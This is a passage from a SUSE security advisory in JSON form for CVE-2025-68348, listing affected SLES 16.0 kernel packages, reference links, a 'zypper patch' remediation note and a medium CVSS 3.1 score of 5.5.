"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68348",
"url": "https://www.suse.com/security/cve/CVE-2025-68348"
},
{
"category": "external",
"summary": "SUSE Bug 1255694 for CVE-2025-68348",
"url": "https://bugzilla.suse.com/1255694"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
